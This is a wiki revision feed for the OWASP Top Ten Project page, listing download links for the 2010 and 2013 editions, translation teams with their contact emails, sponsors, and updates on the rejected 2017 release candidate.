*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP Top 10 - 2013 - Release Candidate]&lt;br /&gt;
*[https://www.owasp.org/images/3/3d/OWASP_Top_10_-_2013_Final_Release_-_Change_Log.docx OWASP Top 10 - 2013 - Final Release - Change Log (docx)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Changes-from-2010.pptx Focusing on What Changed Since 2010 (PPTX)]&lt;br /&gt;
&lt;br /&gt;
[[File:OWASP_Web_Top_10_for_2013.png]]&lt;br /&gt;
&lt;br /&gt;
== Feedback ==&lt;br /&gt;
&lt;br /&gt;
Please let us know how your organization is using the OWASP Top 10. Include your name, organization's name, and brief description of how you use the list. Thanks for supporting OWASP! &lt;br /&gt;
&lt;br /&gt;
We hope you find the information in the OWASP Top 10 useful. Please contribute back to the project by sending your comments, questions, and suggestions to topten@lists.owasp.org. Thanks! &lt;br /&gt;
&lt;br /&gt;
To join the OWASP Top 10 mailing list or view the archives, please visit the [http://lists.owasp.org/mailman/listinfo/owasp-topten subscription page.] &lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ==== Project Identification ====&lt;br /&gt;
{{Template:OWASP OWASP_Top10 Project}} --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2010 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On April 19, 2010 the final version of the OWASP Top 10 for 2010 was released, and here is the associated [[OWASPTop10-2010-PressRelease|press release]]. This version was updated based on numerous comments received during the comment period after the release candidate was released in Nov. 2009. &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 - 2010 Document] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 - 2010 - wiki]] &lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2010%20Presentation.pptx OWASP Top 10 - 2010 Presentation]&lt;br /&gt;
*[http://blip.tv/owasp-appsec-conference-in-europe/day2_track1_1430-1505-3936900 OWASP Top 10 Video of the Presentation above - this focused alot on the Top 10 for 2010 approach, rather than the details. (From OWASP AppSec EU 2010)]&lt;br /&gt;
*[http://www.vimeo.com/9006276 OWASP Top 10 Video of this Presentation when the Top 10 for 2010 was 1st released for comment - this goes through each item in the Top 10. (From OWASP AppSec DC 2009)]&lt;br /&gt;
&lt;br /&gt;
For 2010, the OWASP Top 10 Most Critical Web Application Security Risks are: &lt;br /&gt;
&lt;br /&gt;
*[[Top_10_2010-A1|A1: Injection]]&lt;br /&gt;
*[[Top_10_2010-A2|A2: Cross-Site Scripting (XSS)]]&lt;br /&gt;
*[[Top_10_2010-A3|A3: Broken Authentication and Session Management]]&lt;br /&gt;
*[[Top_10_2010-A4|A4: Insecure Direct Object References]]&lt;br /&gt;
*[[Top_10_2010-A5|A5: Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
*[[Top_10_2010-A6|A6: Security Misconfiguration]]&lt;br /&gt;
*[[Top_10_2010-A7|A7: Insecure Cryptographic Storage]]&lt;br /&gt;
*[[Top_10_2010-A8|A8: Failure to Restrict URL Access]]&lt;br /&gt;
*[[Top_10_2010-A9|A9: Insufficient Transport Layer Protection]]&lt;br /&gt;
*[[Top_10_2010-A10|A10: Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages and the 2010 version was translated into even more languages. See below for all the translated versions.&lt;br /&gt;
&lt;br /&gt;
== 2010 Versions ==&lt;br /&gt;
&lt;br /&gt;
2010 Edition: &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 2010 - PDF] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 2010 - wiki]]&lt;br /&gt;
&lt;br /&gt;
2010 Translations: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF / 这里下载PDF格式文档]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] &lt;br /&gt;
*[[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]]&lt;br /&gt;
*[https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF]&lt;br /&gt;
*[https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF]&lt;br /&gt;
*[https://www.owasp.org/images/8/86/OWASP_Top_10_-_2010_FINAL_%28spanish%29.pptx OWASP Top 10 2010 - Spanish PPT]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF]&lt;br /&gt;
&lt;br /&gt;
2010 Release Candidate: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/index.php/File:OWASP_T10_-_2010_rc1.pdf OWASP Top 10 2010 Release Candidate] &lt;br /&gt;
*[https://www.owasp.org/images/e/e1/OWASP_Top_10_RC-Public_Comments.docx OWASP Top 10 2010 Release Candidate Comments], except for one set of scanned comments [https://www.owasp.org/images/2/2e/OWASP_T10_-_2010_rc1_cmts_Kai_Jendrian.pdf which are here].&lt;br /&gt;
&lt;br /&gt;
Previous versions: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/e/e8/OWASP_Top_10_2007.pdf OWASP Top 10 2007 - PDF] &lt;br /&gt;
*[[Top 10 2007|OWASP Top 10 2007 - wiki]] &lt;br /&gt;
*[https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#tab=Project_Details OWASP Top 10 2007 - PDF Translations are here] &lt;br /&gt;
*[[Top 10 2004|OWASP Top 10 2004 - wiki]]&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
= Translation Efforts =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The 2017 RC1 has been rejected. There will be an RC2 coming out shortly. As RC2 may have significant changes from RC1, we suggest that you wait for RC2 before continuing your translation efforts. &lt;br /&gt;
&lt;br /&gt;
If you are interested in helping, please contact the members of the team for the language you are interested in contributing to, or if you don't see your language listed, please email owasp-topten@lists.owasp.org to let us know that you want to help and we'll form a volunteer group for your language.&lt;br /&gt;
&lt;br /&gt;
Here is the original source document for the [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pptx OWASP Top 10 - 2017 '''Release Candidate''' which is in PowerPoint].  &lt;br /&gt;
&lt;br /&gt;
2017 Release Candidate Translation Teams:&lt;br /&gt;
&lt;br /&gt;
* French: Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org. &lt;br /&gt;
* Chinese: 王颉、包悦忠、Rip、顾凌志、王厚奎、王文君、吴楠、夏天泽、夏玉明、杨天识、袁明坤、张镇(排名不分先后，按姓氏拼音排列)  [https://www.owasp.org/images/8/8f/OWASP_Top_10_2017（RC1）中文版（V1.0）.pdf OWASP Top10 2017 RC1 - Chinese PDF]&lt;br /&gt;
* Azerbaijanian: Rashad Aliyev (rashad@aliev.info)&lt;br /&gt;
* Others to be listed.&lt;br /&gt;
&lt;br /&gt;
2013 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
* Arabic: [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic PDF]  Translated by: Mohannad Shahat: Mohannad.Shahat@owasp.org, Fahad: @SecurityArk, Abdulellah Alsaheel: cs.saheel@gmail.com, Khalifa Alshamsi: Khs1618@gmail.com and Sabri(KING SABRI): king.sabri@gmail.com, Mohammed Aldossary: mohammed.aldossary@owasp.org&lt;br /&gt;
* Chinese 2013：中文版2013 [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)]. 项目组长： Rip 王颉， 参与人员： 陈亮、 顾庆林、 胡晓斌、 李建蒙、 王文君、 杨天识、 张在峰&lt;br /&gt;
* Czech 2013: [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)] [https://www.owasp.org/images/0/02/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pptx OWASP Top 10 2013 - Czech (PPTX)] CSIRT.CZ - CZ.NIC, z.s.p.o. (.cz domain registry): Petr Zavodsky: petr.zavodsky@owasp.org, Vaclav Klimes, Zuzana Duracinska, Michal Prokop, Edvard Rejthar, Pavel Basta&lt;br /&gt;
*French 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French PDF] Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org, Erwan Abgrall: g4l4drim@gmail.com, Benjamin Avet: benjamin.avet@gmail.com, Jocelyn Aubert: jocelyn.aubert@owasp.org, Damien Azambour: damien.azambourg@owasp.org, Aline Barthelemy: aline.barthelemy@fr.abb.com, Moulay Abdsamad Belghiti: abdsamad.belghiti@gmail.com, Gregory Blanc: gregory.blanc@gmail.com, Clément Capel: clement.capel@sfr.com, Etienne Capgras: Etienne.capgras@solucom.fr, Julien Cayssol: julien@aqwz.com, Antonio Fontes: antonio.fontes@owasp.org, Ely de Travieso: Ely.detravieso@owasp.org, Nicolas Grégoire: nicolas.gregoire@agarri.fr, Valérie Lasserre: valerie.lasserre@gmx.fr, Antoine Laureau: antoine.laureau@owasp.org, Guillaume Lopes: lopes.guillaume@free.fr, Gilles Morain: gilles.morain@gmail.com, Christophe Pekar: christophe.pekar@owasp.org, Olivier Perret: perrets@free.fr, Michel Prunet: michel.prunet@owasp.org, Olivier Revollat: revollat@gmail.com, Aymeric Tabourin: aymeric.tabourin@orange.com&lt;br /&gt;
* German 2013: [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Torsten Gigler, Tobias Glemser, Dr. Ingo Hanke, Thomas Herzog, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
* Hebrew 2013: [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf PDF] Translated by: Or Katz, Eyal Estrin, Oran Yitzhak, Dan Peled, Shay Sivan.&lt;br /&gt;
* Italian 2013: [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian PDF] Translated by: Michele Saporito: m.saporito7@gmail.com, Paolo Perego: thesp0nge@owasp.org, Matteo Meucci: matteo.meucci@owasp.org, Sara Gallo: sara.gallo@gmail.com, Alessandro Guido: alex@securityaddicted.com, Mirko Guido Spezie: mirko@dayu.it, Giuseppe Di Cesare: giuseppe.dicesare@alice.it, Paco Schiaffella: schiaffella@gmail.com, Gianluca Grasso: giandou@gmail.com, Alessio D'Ospina: alessiodos@gmail.com, Loredana Mancini: loredana.mancini@business-e.it, Alessio Petracca: alessio.petracca@gmail.com, Giuseppe Trotta: giutrotta@gmail.com, Simone Onofri: simone.onofri@gmail.com, Francesco Cossu: hambucker@gmail.com, Marco Lancini: marco.lancini.ml@gmail.com, Stefano Zanero: zanero@elet.polimi.it, Giovanni Schmid: giovanni.schmid@na.icar.cnr.it, Igor Falcomata': koba@sikurezza.org&lt;br /&gt;
*Japanese 2013: [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese PDF] Translated by: Chia-Lung Hsieh: ryusuke.tw(at)gmail.com, Reviewed by: Hiroshi Tokumaru, Takanori Nakanowatari&lt;br /&gt;
* Korean 2013: [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korean PDF] (이름가나다순) 김병효:byounghyo.kim@owasp.org, 김지원:jiwon.kim@owasp.or.kr, 김효근:katuri@katuri.kr, 박정훈:xelion@gmail.com, 성영모:youngmo.seong@owasp.or.kr, 성윤기:yune.sung@owasp.org, 송보영:boyoung.song@owasp.or.kr, 송창기:factor7@naver.com, 유정호:griphis77@gmail.com, 장상민:sangmin.jang@owasp.or.kr, 전영재:youngjae.jeon@owasp.org, 정가람:tgcarrot@gmail.com, 정홍순:jhs728@gmail.com, 조민재:johnny.cho@owasp.org,허성무:issimplenet@gmail.com&lt;br /&gt;
*Brazilian Portuguese 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese PDF] Translated by: Carlos Serrão, Marcio Machry, Ícaro Evangelista de Torres, Carlo Marcelo Revoredo da Silva, Luiz Vieira, Suely Ramalho de Mello, Jorge Olímpia, Daniel Quintão, Mauro Risonho de Paula Assumpção, Marcelo Lopes, Caio Dias, Rodrigo Gularte&lt;br /&gt;
*Spanish 2013: [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish PDF] Gerardo Canedo: gerardo.canedo@owasp.org, Jorge Correa: jacorream@gmail.com, Fabien Spychiger: fabien.spychiger@dreamlab.net, Alberto Hill: alberto.daniel.hill@gmail.com, Johnatan Stanley: johnatanst@gmail.com, Maximiliano Alonzo: malonzo@tib.com.uy, Mateo Martinez: mateo.martinez@owasp.org, David Montero: david.montero@owasp.org, Rodrigo Martinez: rodmart@fing.edu.uy, Guillermo Skrilec: guillermo.skrilec@owasp.org, Felipe Zipitria: felipe.zipitria@owasp.org, Fabien Spychiger: fabien.spychiger@dreamlab.net, Rafael Gil: rafael.gillarios@owasp.org, Christian Lopez: christian.lopez.martin@owasp.org, jonathan fernandez jonathan.fernandez04@gmail.com, Paola Rodriguez: Paola_R1@verifone.com, Hector Aguirre: hector.antonio.aguirre@owasp.org, Roger Carhuatocto: rcarhuatocto@intix.info, Juan Carlos Calderon: johnccr@yahoo.com, Marc Rivero López: mriverolopez@gmail.com, Carlos Allendes: carlos.allendes@owasp.org, daniel@carrero.cl: daniel@carrero.cl, Manuel Ramírez: manuel.ramirez.s@gmail.com, Marco Miranda: marco.miranda@owasp.org, Mauricio D. Papaleo Mayada: mpapaleo@gmail.com, Felipe Sanchez: felipe.sanchez@peritajesinformaticos.cl, Juan Manuel Bahamonde: juanmanuel.bahamonde@gmail.com, Adrià Massanet: adriamassanet@gmail.com, Jorge Correa: jacorream@gmail.com, Ramiro Pulgar: ramiro.pulgar@owasp.org, German Alonso Suárez Guerrero: german.suarez@owasp.org, Jose A. Guasch: jaguasch@gmail.com, Edgar Salazar: edgar.salazar@owasp.org&lt;br /&gt;
*Ukrainian 2013: [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian PDF] Kateryna Ovechenko, Yuriy Fedko, Gleb Paharenko, Yevgeniya Maskayeva, Sergiy Shabashkevich, Bohdan Serednytsky&lt;br /&gt;
&lt;br /&gt;
2010 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
*Korean 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF] Hyungkeun Park, (mirrk1@gmail.com)&lt;br /&gt;
*Spanish 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF] *Daniel Cabezas Molina , Edgar Sanchez, Juan Carlos Calderon, Jose Antonio Guasch, Paulo Coronado, Rodrigo Marcos, Vicente Aguilera&lt;br /&gt;
*French 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] ludovic.petit@owasp.org, sebastien.gioria@owasp.org, antonio.fontes@owasp.org, benoit.guerette@owasp.org, Jocelyn.aubert@owasp.org, Eric.Garreau@gemalto.com, Guillaume.Huysmans@gemalto.com &lt;br /&gt;
*German: [[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Tobias Glemser, Dr. Ingo Hanke, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
*Indonesian: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF] Tedi Heriyanto (coordinator), Lathifah Arief, Tri A Sundara, Zaki Akhmad&lt;br /&gt;
*Italian: [https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF] Simone Onofri, Paolo Perego, Massimo Biagiotti, Edoardo Viscosi, Salvatore Fiorillo, Roberto Battistoni, Loredana Mancini, Michele Nesta, Paco Schiaffella, Lucilla Mancini, Gerardo Di Giacomo, Valentino Squilloni&lt;br /&gt;
*Japanese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF] cecil.su@owasp.org, Dr. Masayuki Hisada, Yoshimasa Kawamoto, Ryusuke Sakamoto, Keisuke Seki, Shin Umemoto, Takashi Arima&lt;br /&gt;
*Chinese: [https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF] 感谢以下为中文版本做出贡献的翻译人员和审核人员: Rip Torn, 钟卫林, 高雯, 王颉, 于振东&lt;br /&gt;
*Vietnamese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF] Translation lead by Cecil Su - Translation Team: Dang Hoang Vu, Nguyen Ba Tien, Nguyen Tang Hung, Luong Dieu Phuong, Huynh Thien Tam&lt;br /&gt;
*Hebrew: [[OWASP_Top10_Hebrew|OWASP Top 10 Hebrew Project]] -- [https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]. Lead by Or Katz, see translation page for list of contributors.&lt;br /&gt;
&lt;br /&gt;
= Project Details =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{:GPC_Project_Details/OWASP_Top10 | OWASP Project Identification Tab}}&lt;br /&gt;
&lt;br /&gt;
= Some Commercial &amp;amp; OWASP Uses of the Top 10 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Warning''': these articles have not been rated for accuracy by OWASP. Product companies should be extremely careful about claiming to &amp;quot;cover&amp;quot; or &amp;quot;ensure compliance&amp;quot; with the OWASP Top 10. The current state-of-the-art for automated detection (scanners and static analysis) and prevention (WAF) is nowhere near sufficient to claim adequate coverage of the issues in the Top 10. Nevertheless, using the Top 10 as a simple way to communicate security to end users is effective. &lt;br /&gt;
&lt;br /&gt;
;[https://blogs.microsoft.com/microsoftsecure/2008/05/01/sdl-and-the-owasp-top-ten/ Microsoft] &lt;br /&gt;
:as a way to measure the coverage of their SDL and improve security&lt;br /&gt;
&lt;br /&gt;
;[https://www.pcisecuritystandards.org/index.shtml PCI Council] &lt;br /&gt;
:as part of the Payment Card Industry Data Security Standard (PCI DSS)&lt;br /&gt;
&lt;br /&gt;
;[http://msdn.microsoft.com/en-us/library/dd129898.aspx Microsoft] &lt;br /&gt;
:to show how &amp;quot;T10 threats are handled by the security design and test procedures of Microsoft&amp;quot;&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_10/Mapping_to_WHID | OWASP]]&lt;br /&gt;
:OWASP Top 10 Mapped to the Web Hacking Incident Database&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Mobile_Security_Project#tab=Top_Ten_Mobile_Risks | OWASP]]&lt;br /&gt;
:OWASP Mobile Top 10 Risks&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_Ten_Cheat_Sheet | OWASP]]&lt;br /&gt;
:OWASP Top 10 Cheat Sheet&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project]] [[Category:OWASP_Document]] [[Category:OWASP_Download]] [[Category:OWASP_Release_Quality_Document]][[Category:Popular]][[Category:SAMM-EG-1]]&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=231975</id>
		<title>Category:OWASP Top Ten Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=231975"/>
				<updated>2017-08-02T21:29:15Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: fixed formatting&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:90px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File: flagship_big.jpg|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&amp;lt;/div&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== OWASP Top 10 2017 - Industry survey open and data call reopened==&lt;br /&gt;
&lt;br /&gt;
The data call for the 2017 Top 10 has been reopened. All industry professionals are encouraged to complete [https://goo.gl/forms/ltbKrdYrp4Qdl7Df2 this survey] to help determine up to two items in the 2017 Top 10. Security analysts, pentesters, and security vendors can submit bulk data of their results at the [https://goo.gl/forms/tLgyvK9O74r7wMkt2 call for data]. This [https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html OWASP blog posting] describes the process in detail. &lt;br /&gt;
&lt;br /&gt;
==OWASP Top 10 2017 – RC1 rejected==&lt;br /&gt;
&lt;br /&gt;
During the [https://owaspsummit.org/website/ OWASP Summit 2017], several sessions took place discussing many different aspects of the OWASP Top 10, for example, governance and validation, the data collection process, data assessment and review of the new suggested A7 and A10.&lt;br /&gt;
Main [https://owaspsummit.org/Outcomes/Owasp-Top-10-2017/Owasp-Top-10-2017.html outcomes of the OWASP Summit] include:&lt;br /&gt;
* RC1 of the OWASP Top 10 2017 has been rejected&lt;br /&gt;
* A1, A2, A3, A4, A5, A6, A8, A9 have been left untouched by consensus view&lt;br /&gt;
* Requirement to choose two additional items&lt;br /&gt;
* Appeal for data and opinion is open until September 18, 2017 ([https://github.com/OWASP/Top10/issues submit here])&lt;br /&gt;
* The new OWASP Top 10 2017 is to be released in late November 2017.&lt;br /&gt;
* New project leadership put in place.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- I think it makes sense just to delete this text - Neil Smithline&lt;br /&gt;
==OWASP Top 10 - 2017 Release Candidate ==&lt;br /&gt;
&lt;br /&gt;
The release candidate for public comment was published 10 April 2017 and can be [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf downloaded here]. OWASP plans to release the final OWASP Top 10 - 2017 in July or August 2017 after a public comment period ending June 30, 2017.&lt;br /&gt;
&lt;br /&gt;
Constructive comments on this [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf OWASP Top 10 - 2017 Release Candidate] should be forwarded via email to the [https://lists.owasp.org/mailman/listinfo/Owasp-topten OWASP Top 10 Project Email List]. Private comments may be sent to [mailto:vanderaj@owasp.org Andrew van der Stock]. Anonymous comments are welcome. All non-private comments will be catalogued and published at the same time as the final public release. Comments recommending changes to the Top 10 should include a complete suggested list of changes, along with a rationale for each change. All comments should indicate the specific relevant page and section.&lt;br /&gt;
&lt;br /&gt;
--&amp;gt;&lt;br /&gt;
==OWASP Top 10 Most Critical Web Application Security Risks==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
==Translation Efforts==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 has been translated to many different languages by numerous volunteers. These translations are available as follows:&lt;br /&gt;
&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2013 | All versions of the OWASP Top 10 - 2013]]&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2010 | All versions of the OWASP Top 10 - 2010]]&lt;br /&gt;
* [[Top10#Translation_Efforts_2 | Information about the various translation teams]]&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
The OWASP Top 10 is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license, so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
{{Social Media Links}}&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== What is the OWASP Top 10? ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 provides:&lt;br /&gt;
&lt;br /&gt;
* '''A list of the 10 Most Critical Web Application Security Risks'''&lt;br /&gt;
&lt;br /&gt;
For each Risk it provides:&lt;br /&gt;
* A description&lt;br /&gt;
* Example vulnerabilities&lt;br /&gt;
* Example attacks&lt;br /&gt;
* Guidance on how to avoid&lt;br /&gt;
* References to OWASP and other related resources&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [[User:vanderaj | Andrew van der Stock]]&lt;br /&gt;
* [[User:Neil_Smithline | Neil Smithline]]&lt;br /&gt;
* [[User:T.Gigler | Torsten Gigler]]&lt;br /&gt;
* [[User:Brianglas | Brian Glas (Data Analyst)]]&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
